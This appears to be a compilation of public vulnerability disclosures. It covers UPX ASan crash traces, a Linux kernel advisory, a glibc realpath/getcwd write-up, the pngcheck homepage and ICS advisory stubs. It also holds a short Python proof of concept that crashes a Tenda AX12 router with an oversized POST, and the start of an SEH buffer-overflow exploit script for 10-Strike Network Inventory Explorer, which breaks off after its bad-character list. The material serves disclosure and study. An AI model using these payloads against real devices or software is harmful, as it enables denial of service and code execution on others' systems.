A heap-based buffer over-read was discovered in the invert_pt_dynamic function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file.

    ==21202==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62f00000c530 at pc 0x00000058b076 bp 0x7ffdc9ecf670 sp 0x7ffdc9ecf668
    READ of size 4 at 0x62f00000c530 thread T0
        #0 0x58b075 in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*) /src/upx-multi/src/p_lx_elf.cpp:1676:25
        #1 0x588959 in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:305:13
        #2 0x5d5e74 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /src/upx-multi/src/./p_lx_elf.h:395:9
        #3 0x5d5e74 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4838:54
        #4 0x5d6261 in PackBSDElf32x86::PackBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4855:50
        #5 0x5d6261 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4866:58
        #6 0x6e4460 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /src/upx-multi/src/packmast.cpp:190:9
        #7 0x6e8ff1 in PackMaster::getUnpacker(InputFile*) /src/upx-multi/src/packmast.cpp:248:18
        #8 0x6e8ff1 in PackMaster::unpack(OutputFile*) /src/upx-multi/src/packmast.cpp:266:9
        #9 0x75826b in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12
        #10 0x7597c2 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13
        #11 0x555aed in main /src/upx-multi/src/main.cpp:1538:5
        #12 0x7efe5d03d83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291
        #13 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98)
    
    0x62f00000c532 is located 0 bytes to the right of 49458-byte region [0x62f000000400,0x62f00000c532)
    allocated by thread T0 here:
        #0 0x49519d in malloc (/out/upx-multi/upx-multi+0x49519d)
        #1 0x569797 in MemBuffer::alloc(unsigned long long) /src/upx-multi/src/mem.cpp:194:42
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /src/upx-multi/src/p_lx_elf.cpp:1676:25 in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*)
    Shadow bytes around the buggy address:
      0x0c5e7fff9850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5e7fff9860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5e7fff9870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5e7fff9880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5e7fff9890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c5e7fff98a0: 00 00 00 00 00 00[02]fa fa fa fa fa fa fa fa fa
      0x0c5e7fff98b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5e7fff98c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5e7fff98d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5e7fff98e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5e7fff98f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==21202==ABORTING
    

    upx 4.0.0-git-87b73e5cfdc1+
    UCL data compression library 1.03
    zlib data compression library 1.2.8
    LZMA SDK version 4.43
    Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer
    Copyright (C) 1996-2020 Laszlo Molnar
    Copyright (C) 2000-2020 John F. Reiser
    Copyright (C) 2002-2020 Jens Medoch
    Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler
    Copyright (C) 1999-2006 Igor Pavlov
    UPX comes with ABSOLUTELY NO WARRANTY; for details t

CVE-2020-27796: Heap buffer overflow in PackLinuxElf32::invert_pt_dynamic · Issue #392 · upx/upx

A heap-based buffer over-read was discovered in the get_le32 function in bele.h in UPX 4.0.0 via a crafted Mach-O file.

    ==5614==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x624000007da0 at pc 0x000000757233 bp 0x7ffe125eb8e0 sp 0x7ffe125eb8d8
    READ of size 4 at 0x624000007da0 thread T0
        #0 0x757232 in get_le32(void const*) /src/upx-multi/src/./bele.h:164:12
        #1 0x757232 in N_BELE_RTP::LEPolicy::get32(void const*) const /src/upx-multi/src/./bele_policy.h:192:18
        #2 0x58a45e in Packer::get_te32(void const*) const /src/upx-multi/src/./packer.h:296:65
        #3 0x58a45e in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*, unsignedint) /src/upx-multi/src/p_lx_elf.cpp:1610:32
        #4 0x588a1e in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:305:13
        #5 0x5d6504 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /src/upx-multi/src/./p_lx_elf.h:395:9
        #6 0x5d6504 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4847:54
        #7 0x5d6a4c in PackNetBSDElf32x86::PackNetBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4884:56
        #8 0x6e4df0 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /src/upx-multi/src/packmast.cpp:191:9
        #9 0x6e9771 in PackMaster::getUnpacker(InputFile*) /src/upx-multi/src/packmast.cpp:248:18
        #10 0x6e9771 in PackMaster::unpack(OutputFile*) /src/upx-multi/src/packmast.cpp:266:9
        #11 0x7589f8 in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12
        #12 0x759f42 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13
        #13 0x555afd in main /src/upx-multi/src/main.cpp:1538:5
        #14 0x7fc6ddc5d83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291
        #15 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98)
    
    0x624000007da2 is located 0 bytes to the right of 7330-byte region [0x624000006100,0x624000007da2)
    allocated by thread T0 here:
        #0 0x49519d in malloc (/out/upx-multi/upx-multi+0x49519d)
        #1 0x5697b7 in MemBuffer::alloc(unsigned long long) /src/upx-multi/src/mem.cpp:194:42
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /src/upx-multi/src/./bele.h:164:12 in get_le32(void const*)
    Shadow bytes around the buggy address:
      0x0c487fff8f60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c487fff8f70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c487fff8f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c487fff8f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c487fff8fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c487fff8fb0: 00 00 00 00[02]fa fa fa fa fa fa fa fa fa fa fa
      0x0c487fff8fc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c487fff8fd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c487fff8fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c487fff8ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c487fff9000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==5614==ABORTING
    
    

    upx 4.0.0-git-8d1d605b3d8c+
    UCL data compression library 1.03
    zlib data compression library 1.2.8
    LZMA SDK version 4.43
    Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer
    Copyright (C) 1996-2020 Laszlo Molnar
    Copyright (C) 2000-2020 John F. Reiser
    Copyright (C) 2002-2020 Jens Medoch
    Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler
    Copyright (C) 1999-2006 Igor Pavlov
    UPX comes with ABSOLUTELY NO WARRANTY; for details type 'upx-multi -L'.

CVE-2020-27800: Another heap buffer overflow in get_le32() · Issue #395 · upx/upx

A heap-based buffer overflow was found in the Linux kernel's LightNVM subsystem. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. This vulnerability allows a local attacker to escalate privileges and execute arbitrary code in the context of the kernel. The attacker must first obtain the ability to execute high-privileged code on the target system to exploit this vulnerability.

July 11th, 2022

**Linux Kernel LightNVM Subsystem Heap-based Overflow Privilege Escalation Vulnerability****ZDI-22-960  
ZDI-CAN-17194**

CVE ID

CVE-2022-2991

CVSS SCORE

8.2, (AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

AFFECTED VENDORS

Linux  

AFFECTED PRODUCTS

Kernel  

VULNERABILITY DETAILS

This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within the LightNVM subsystem. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel.  

ADDITIONAL DETAILS

Linux has issued an update to correct this vulnerability. More details can be found at:  
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/drivers/lightnvm/Kconfig?h=v5.10.114&id=549209caabc89f2877ad5f62d11fca5c052e0e8 https://access.redhat.com/security/cve/CVE-2022-2991  

DISCLOSURE TIMELINE

*   2022-04-27 - Vulnerability reported to vendor
*   2022-07-11 - Coordinated public release of advisory
*   2022-08-25 - Advisory Updated

CREDIT

Lucas Leong (@\_wmliang\_) of Trend Micro Zero Day Initiative  

BACK TO ADVISORIES

CVE-2022-2991: ZDI-22-960

Tenda AX12 V22.03.01.21_CN is vulnerable to Buffer Overflow. This overflow is triggered in the sub_42FDE4 function, which satisfies the request of the upper-level interface function sub_430124, that is, handles the post request under /goform/SetIpMacBind.

**Vulnerability description**

Affect device：Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability is a vulnerability overflow triggered in the **sub\_42FDE4** function, which satisfies the request of the upper-level interface function **sub\_430124**, that is, handles the post request under **/goform/SetIpMacBind**

First, sub\_430124 calls the sub\_42FFF8 function.

In the **sub\_42FFF8** function, the two parameters **bindnum** and **list** passed in by the post are obtained, and the address of the list value is used as the parameter of the **sub\_42FDE4** function.

**sub\_42FDE4**, **strcpy(v16, v6)**, **v6** is the incoming **list** parameter, and no length limit and security check are used in this process, so the attacker can cause stack overflow through a long **list** and achieve denial of service attack.

**POC**

Poc of Denial of Service(DoS):

import requests
from pwn import \*

url \= "http://192.168.0.1/goform/SetIpMacBind"
cookie \= {"Cookie":"password=1111"}
data \= {"bindnum": "1", "list":"\\r" + "A" \* 1000}

requests.post(url, cookies\=cookie, data\=data)

CVE-2022-37292: IOT-CVE/Tenda/AX12/1 at master · The-Itach1/IOT-CVE

A flaw in Apache libapreq2 versions 2.16 and earlier could cause a buffer overflow while processing multipart form uploads. A remote attacker could send a request causing a process crash which could lead to a denial of service attack.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-22728

A flaw was found in glibc. The realpath() function can mistakenly return an unexpected value, potentially leading to information leakage and disclosure of sensitive data.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Mon, 24 Jan 2022 14:05:01 +0000
From: Qualys Security Advisory <qsa@...lys.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: CVE-2021-3998 and CVE-2021-3999 in glibc's realpath() and getcwd()

Hi all,

We discovered two vulnerabilities in the glibc, CVE-2021-3998 in
realpath() and CVE-2021-3999 in getcwd(). Patches are now available at
(many thanks to Siddhesh Poyarekar and Red Hat Product Security):

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ee8d5e33adb284601c00c94687bc907e10aec9bb
https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=f7a79879c0b2bef0dadd6caaaeeb0d26423e04e5

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e
https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=472e799a5f2102bc0c3206dbd5a801765fceb39c

Below is a short write-up (which is part of a longer advisory that is
mostly unrelated to the glibc and that we will publish at a later date):


========================================================================
CVE-2021-3998: Unexpected return value from glibc's realpath()
========================================================================

While auditing umount and fusermount, we also discovered a vulnerability
in the glibc's realpath() function, which is used internally by various
programs. Normally, when the output buffer "resolved" that is passed to
realpath() is not NULL, then realpath() either returns NULL on failure,
or it returns the output buffer "resolved" on success. Unfortunately,
since commit c6e0b0b ("stdlib: Sync canonicalize with gnulib") from
January 2021, realpath() can mistakenly return a malloc()ated buffer
that is neither NULL nor the output buffer "resolved":

------------------------------------------------------------------------
430 char \*
431 \_\_realpath (const char \*name, char \*resolved)
432 {
...
437   struct scratch\_buffer rname\_buffer;
438   return realpath\_stk (name, resolved, &rname\_buffer);
439 }
------------------------------------------------------------------------
197 static char \*
198 realpath\_stk (const char \*name, char \*resolved,
199               struct scratch\_buffer \*rname\_buf)
200 {
...
399   failed = false;
...
403   if (resolved != NULL && dest - rname <= get\_path\_max ())
404     rname = strcpy (resolved, rname);
...
410   if (failed || rname == resolved)
411     {
412       scratch\_buffer\_free (rname\_buf);
413       return failed ? NULL : resolved;
414     }
415 
416   return scratch\_buffer\_dupfree (rname\_buf, dest - rname);
417 }
------------------------------------------------------------------------

For example, if the input path "name" is "." and if the current working
directory is longer than PATH\_MAX, then:

- at line 399, "failed" is set to false;

- at lines 403-404, "rname" is NOT set to "resolved" and "resolved" is
  left untouched and uninitialized (because "dest - rname" is longer
  than PATH\_MAX);

- the code block at lines 410-414 is skipped (because "failed" is false
  and "rname" is not "resolved");

- at line 416, scratch\_buffer\_dupfree() returns a malloc()ated buffer
  that is NOT the output buffer "resolved".

The consequences of this vulnerability depend on the affected programs;
for example, fusermount (a SUID-root program) can disclose sensitive
information (pointers) when displaying the contents of a stack-based
buffer that is mistakenly left uninitialized by realpath() (we tested
this proof of concept on Ubuntu 21.04):

------------------------------------------------------------------------
$ gcc -o CVE-2021-3998-fusermount CVE-2021-3998-fusermount.c
$ ./CVE-2021-3998-fusermount > CVE-2021-3998-fusermount.output
...

$ hexdump -C CVE-2021-3998-fusermount.output
00000000  2f 75 73 72 2f 62 69 6e  2f 66 75 73 65 72 6d 6f  |/usr/bin/fusermo|
00000010  75 6e 74 3a 20 65 6e 74  72 79 20 66 6f 72 20 f0  |unt: entry for .|
00000020  83 9b 99 ff 7f 20 6e 6f  74 20 66 6f 75 6e 64 20  |..... not found |
00000030  69 6e 20 2f 65 74 63 2f  6d 74 61 62 0a 0a 2f 75  |in /etc/mtab../u|
00000040  73 72 2f 62 69 6e 2f 66  75 73 65 72 6d 6f 75 6e  |sr/bin/fusermoun|
00000050  74 3a 20 65 6e 74 72 79  20 66 6f 72 20 39 ac b7  |t: entry for 9..|
00000060  a5 a2 7f 20 6e 6f 74 20  66 6f 75 6e 64 20 69 6e  |... not found in|
00000070  20 2f 65 74 63 2f 6d 74  61 62 0a 0a              | /etc/mtab..|
------------------------------------------------------------------------


========================================================================
CVE-2021-3999: Off-by-one buffer overflow/underflow in glibc's getcwd()
========================================================================

While studying the vulnerability in realpath(), we also discovered a
vulnerability in the glibc's getcwd() function (which is used internally
by realpath() to resolve relative pathnames) -- an off-by-one buffer
overflow and underflow, but if and only if the "size" of "buf" is
exactly 1:

------------------------------------------------------------------------
 48 \_\_getcwd (char \*buf, size\_t size)
 49 {
 ..
 54   size\_t alloc\_size = size;
 ..
 76     path = buf;
 ..
 80   retval = INLINE\_SYSCALL (getcwd, 2, path, alloc\_size);
...
100   if (retval >= 0 || errno == ENAMETOOLONG)
101     {
...
110       result = \_\_getcwd\_generic (path, size);
------------------------------------------------------------------------
158 \_\_getcwd\_generic (char \*buf, size\_t size)
159 {
...
187   size\_t allocated = size;
...
247     dir = buf;
248 
249   dirp = dir + allocated;
250   \*--dirp = '\\0';
...
262   while (!(thisdev == rootdev && thisino == rootino))
263     {
...
441     }
...
449   if (dirp == &dir\[allocated - 1\])
450     \*--dirp = '/';
...
457   used = dir + allocated - dirp;
458   memmove (dir, dirp, used);
------------------------------------------------------------------------

If, at line 48, the "size" of "buf" is exactly 1:

- and if, at line 80, the kernel's getcwd() syscall fails with the error
  ENAMETOOLONG (because the current working directory is longer than
  PATH\_MAX),

- then, at line 110, a generic implementation of getcwd() is called;

- at line 250, a null byte is written to "dirp", which points exactly to
  "buf" (because "size", and hence "allocated", are exactly 1);

- if the code block at lines 262-441 is skipped entirely (if the current
  working directory corresponds to the "/" directory),

- then, at lines 449-450, a slash is written to "buf-1" (an off-by-one
  buffer underflow, because at line 449 "dirp" was still pointing
  exactly to "buf"),

- and, at lines 457-458, a null byte is written to "buf+1" (an
  off-by-one buffer overflow, because at line 457 "used" is exactly 2).

It may seem impossible to satisfy the condition at line 100 (the current
working directory is longer than PATH\_MAX) and the condition at line 262
(the current working directory corresponds to the "/" directory), but in
reality we can:

- in a child process:

  - create an unprivileged mount namespace;

  - create a directory longer than PATH\_MAX;

  - bind-mount "/" onto this directory;

  - open() this directory and send its file descriptor to the parent
    process (outside the unprivileged mount namespace);

- in the parent process:

  - receive the file descriptor of this directory (which corresponds to
    "/" and is longer than PATH\_MAX) and fchdir() to it;

  - execute a SUID program that calls getcwd() with a buffer of size 1,
    which triggers the off-by-one buffer overflow and underflow.

Apparently, this vulnerability was introduced in February 1995 by the
very first commit in the glibc's git history (28f540f, "initial import")
and could be triggered without an unprivileged mount namespace, by
simply chdir()ing to the "/" directory:

------------------------------------------------------------------------
190 getcwd (buf, size)
...
218     path = buf;
...
226   pathp = path + size;
227   \*--pathp = '\\0';
...
242   while (!(thisdev == rootdev && thisino == rootino))
243     {
...
351     }
352 
353   if (pathp == &path\[size - 1\])
354     \*--pathp = '/';
...
359   memmove (path, pathp, path + size - pathp);
------------------------------------------------------------------------

Although "the size of buf is exactly 1" is a strong requirement,
vulnerable code like the following may exist in the wild:

------------------------------------------------------------------------
#include <unistd.h>
#include <stdio.h>

int main(int argc, char \* argv\[\]) {
    char buf\[4096\];
    int len = snprintf(buf, sizeof(buf), "%s: cwd is ", argv\[0\]);
    if (len <= 0 || (unsigned)len >= sizeof(buf)) return \_\_LINE\_\_;
    if (!getcwd(buf + len, sizeof(buf) - len)) return \_\_LINE\_\_;
    puts(buf);
    return 0;
}
------------------------------------------------------------------------


Thank you very much! We are at your disposal for questions, comments,
and further discussions.

With best regards,

-- 
the Qualys Security Advisory team

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2021-3998: security - CVE-2021-3998 and CVE-2021-3999 in glibc's realpath() and getcwd()

A global buffer overflow was discovered in pngcheck function in pngcheck-2.4.0(5 patches applied) via a crafted png file.

**pngcheck** verifies the integrity of PNG, JNG and MNG files (by checking the internal 32-bit CRCs, a.k.a. checksums, and decompressing the image data); it can optionally dump almost all of the chunk-level information in the image in human-readable form. For example, it can be used to print the basic statistics about an image (dimensions, bit depth, etc.); to list the color and transparency info in its palette (assuming it has one); or to extract the embedded text annotations. This is a command-line program with batch capabilities.

Here's some sample output (screen shots, eh?):

    % **pngcheck -cvt ArcTriomphe-iCCP-red-blue-swap.png**
    File: **ArcTriomphe-iCCP-red-blue-swap.png** (5171 bytes)
      chunk IHDR at offset 0x0000c, length 13
        64 x 64 image, 8-bit colormap, non-interlaced
      chunk iCCP at offset 0x00025, length 461
        profile name = Swapped red & blue channel
        compression method = 0 (deflate), compressed profile = 433 bytes
      chunk PLTE at offset 0x001fe, length 759: 253 palette entries
      chunk IDAT at offset 0x00501, length 3616
        zlib: deflated, 32K window, default compression
      chunk tEXt at offset 0x0132d, length 68, keyword: Title
        PNG color-correction test image, swapped red and blue channels
      chunk tEXt at offset 0x0137d, length 143, keyword: Copyright
        Copyright 2005 Greg Roelofs. Licensed under Creative Commons
        AttributionNonCommercial, http://creativecommons.org/licenses/by-nc/2.5/
      chunk tIME at offset 0x01418, length 7: 16 Aug 2005 07:07:07 GMT
      chunk IEND at offset 0x0142b, length 0
    **No errors detected** in ArcTriomphe-iCCP-red-blue-swap.png (8 chunks, -26.2% compression).

    % **pngcheck -c \*.png**
    **OK**: 000000.png (48x48, 1-bit grayscale, non-interlaced, 71.2%).
    **OK**: 000033.png (48x48, 1-bit colormap, non-interlaced, 66.0%).
    **OK**: 000066.png (48x48, 1-bit colormap, non-interlaced, 66.0%).
    **OK**: 000099.png (48x48, 1-bit colormap, non-interlaced, 66.0%).
     \[...\]
    **OK**: ffff66.png (48x48, 1-bit colormap, non-interlaced, 66.0%).
    **OK**: ffff99.png (48x48, 1-bit colormap, non-interlaced, 66.0%).
    **OK**: ffffcc.png (48x48, 1-bit colormap, non-interlaced, 66.0%).
    **OK**: ffffff.png (48x48, 1-bit grayscale, non-interlaced, 70.1%).
    ataylor-bad-text-length.png  illegal (unless recently approved) unknown, public chunk xORk
    **ERROR**: ataylor-bad-text-length.png
    google-island-96x69.png  zlib: inflate error = -3 (data error)
    **ERROR**: google-island-96x69.png

    Errors were detected in 2 of the 218 files tested.
    No errors were detected in 216 of the 218 files tested.

**Vulnerability Warning**

  
pngcheck versions 3.0.2 and earlier have a divide-by-zero bug when zlib-decoding interlaced PNGs with extra data beyond what is required for the declared image dimensions. This bug is fixed in version **3.0.3**, released on 25 April 2021. Again, while all _known_ vulnerabilities are fixed in this version, the code is quite crufty, so it would be safest to assume there are still some problems hidden in there. As always, use at your own risk.

The current release supports all PNG, MNG and JNG chunks, including the newer **sTER** (stereo layout) and **eXIf** (EXIF metadata) chunks. It correctly reports errors in all but two of the images in Chris Nokleberg's brokensuite-20061204. Also included (since version 2.1.0) are two helper utilities:

*   **pngsplit** - break a PNG, MNG or JNG image into constituent chunks (numbered for easy reassembly)
*   **png-fix-IDAT-windowsize** - fix minor zlib-header breakage caused by libpng 1.2.6

The extra utilities are licensed under the GNU General Public License (GPL); pngcheck itself remains under its original, MIT/X11-style license.

**Security and Crash Bugs in Older Versions**

**Vulnerability Warning**

  
pngcheck versions 3.0.1 and earlier have a buffer-overrun bug related to the MNG LOOP chunk (which gets noticed even in PNG files if the \-s option is used). This bug is fixed in version **3.0.2**, released on 31 January 2021. Again, while all _known_ vulnerabilities are fixed in this version, the code is quite crufty, so it would be safest to assume there are still some problems hidden in there. As always, use at your own risk.

**Vulnerability Warning**

  
pngcheck versions 3.0.0 and earlier have a pair of buffer-overrun bugs related to the sPLT and PPLT chunks (the latter is a MNG-only chunk, but it gets noticed even in PNG files if the \-s option is used). Both bugs are fixed in version **3.0.1**, released on 24 January 2021. Again, while all _known_ vulnerabilities are fixed in this version, the code is quite crufty, so it would be safest to assume there are still some problems hidden in there. As always, use at your own risk.

**Vulnerability Warning**

  
pngcheck versions 2.4.0 and earlier have a number of buffer-overrun bugs, most (but not all) of which are related to the -f option ("force continued parsing after major errors"). As such, the option has been removed altogether in version **3.0.0** (which is the reason for the major-version bump), released on 12 December 2020. All _known_ vulnerabilities are fixed in this version, but the code is pretty crufty, so it would be safest to assume there are still some problems hidden in there. As always, use at your own risk.

*   PNG home page
*   MNG home page

 _Last updated 22 August 2021._

Copyright © 2000-2021 Greg Roelofs.

CVE-2020-35511: pngcheck Home Page

This advisory contains mitigations for Untrusted Pointer Dereference, Stack-based Buffer Overflow, Use After Free, and Link Following vulnerabilities in Measuresoft ScadaPro Server and Client, a supervisory control and data acquisition (SCADA) system.

Measuresoft ScadaPro Server and Client

This advisory contains mitigations for a Stack-based Buffer Overflow vulnerability in versions of Hitatchi Energy RTU500 firmware.

Hitachi Energy RTU500

10-Strike Network Inventory Explorer versions 9.3 and below are vulnerable to a SEH based buffer overflow which leads to code execution or local privilege escalation. The vulnerable part of the program is the functionality to add computers from a text file.

I. VULNERABILITY  
-------------------------  
10-Strike Network Inventory Explorer Version 9.3 - Privilege Escalation through SEH based Buffer Overflow

II. VENDOR  
-------------------------  
10-Strike Network (https://www.10-strike.com/)

III. DESCRIPTION  
-------------------------

10-Strike Network Inventory Explorer until latest version (9.3) is vulnerable to a SEH based Buffer Overflow which leads to code execution or local privilege escalation. The vulnerable part of the program is the functionality to add computers from a text file.

IV. EXPLOIT  
-------------------------  
# Exploit Title: 10-Strike Network Inventory Explorer Version 9.3 - Privilege Escalation through SEH based Buffer Overflow  
# Date: 16/08/2022  
# Exploit Author: Ricardo Ruiz (@ricardojoserf)  
# Vendor website: https://www.10-strike.com/  
# Product website: https://www.10-strike.com/networkinventoryexplorer/  
# Usage: Create a file with this script and upload it clicking "Computers" and "Add". It should pop a calculator

from struct import pack

# Bad chars are: \x09\x0a\x0d\x3a\x5c  
badchars = (  
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"  
b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3b\x3c\x3d\x3e\x3f\x40"  
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"  
b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5d\x5e\x5f\x60"  
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"  
b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"  
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"  
b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"  
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"  
b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"  
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"  
b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"  
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"  
b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"  
#b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"  
#b"\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0e\x0f\x10"  
)

